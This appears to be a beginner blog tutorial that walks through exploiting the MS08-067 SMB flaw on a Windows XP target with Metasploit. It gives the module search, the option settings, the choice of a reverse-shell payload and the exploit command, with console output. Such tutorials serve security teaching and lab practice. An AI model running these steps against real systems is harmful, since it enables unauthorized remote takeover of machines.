Starting up with METASPLOIT & Attack.

Get starting and go for our first attack to compromise a system. In Kali Linux Metasploit come by default, so we can start it with no matters where our <root@kali:~#pwd > pointed.
Before starting Metasploit, start the PostgreSQL database, which will be connected to Metasploit to track and what you do.

root@kali:~# service postgresql start

Now we’re all set to start Metasploit service. The command above will create a PostgreSQL user named “msf3” and also starts up the web server.

root@kali:~# service Metasploit start

Now we can enter into the console by command msfconsole

root@kali:~# msfconsole

Don’t get startled if it takes time to start. It’s getting ready for you. Once it’s finished, you’ll see some ASCII code graffiti, Metasploit version, and other details.

metasploit-image -with-bunny-art-banner

Skipping some very basics quickly moving up to our exploit.

Finding the METASPLOIT Modules:

We will exploit the vulnerability on our victim windows XP machine patched in Microsoft Security Bulletin MS08-067.
The vulnerability from 2008 MS08-067 was an issue in the netapi32.dll that allow attackers to execute remote procedure call request via the Server Message Block (SMB) service to take over a target system. This vulnerability is expressly critical because it does not require an attacker to authenticate to the target machine.
for more details, you can visit the Metasploit online database of modules
(http://www.rapid7.com/db/modules/)

exploit-database-online-rapid7-modules
OR
Just search internally,

msf > search ms08-067

Matching Modules
================

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption

Here we will see the correct exploit name so we search for more information.

msf > info exploit/windows/smb/ms08_067_netapi

Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28

Provided by:
hdm <x@hdm.io>
Brett Moore <brett.moore@insomniasec.com>
frank2 <frank2@dc949.org>
jduck <jduck@metasploit.com>

Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal

Read through the content if want uncomplicated structure just comments below.

To use this module in Metasploit

msf > use windows/smb/ms08_067_netapi

metasploit-set-payload-command

Now obviously Metasploit need some information from you about attacker or victim because it doesn’t know magic words. use show options to see what Metasploit needs.

msf exploit(ms08_067_netapi) > show options

metasploit-show-options-command-for-exploit
RHOST: This option refers to the remote host we want to exploit. Here we have Windows XP machine as our target so we set RHOST to the <IP> of our target.

msf exploit(ms08_067_netapi) > set RHOST <target IP>

RPORT: Refers to the remote port. Here we can see RPORT is already set to 445, which is the default port for SMB.

SMBPIPE: This will also set be default to BROWSER, it helps us to talk some interprocess of the windows over the network.

To view target OS and versions

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

Id Name
 -- ----
 0 Automatic Targeting
 1 Windows 2000 Universal
 2 Windows XP SP0/SP1 Universal
 3 Windows 2003 SP0 Universal
 4 Windows XP SP2 English (AlwaysOn NX)
 5 Windows XP SP2 English (NX)
 6 Windows XP SP3 English (AlwaysOn NX)
 7 Windows XP SP3 English (NX)
...............

the exploit is set to 0 by default for Automatic Targeting.

Now we feel like we are set and all done, but at this point, we still did not tell our exploit what to do once the target gets exploited.
for this, we have PAYLOADS in Metasploit which we can use as per our need. to find the correct one:

msf exploit(ms08_067_netapi) > show payloads

metasploit-payload-list-for-exploit

This will give you the complete list of payloads available for specific exploit.

here we setup PAYLOAD manually

msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp

this is a reverse shell, exploit to send back the shell. here we need to enter the IP address of the attacker machine and the port. and again show options to set them.

and finally, Execute our exploit

msf exploit(ms08_067_netapi) > exploit

metasploit-successful-exploit-windows-xp-image

Congratulations: You have successfully exploited your first machine!

Stay stick for the further blog to know what more we can perform now after getting the session.

1 Comment

Leave a Reply

Your email address will not be published. Required fields are marked *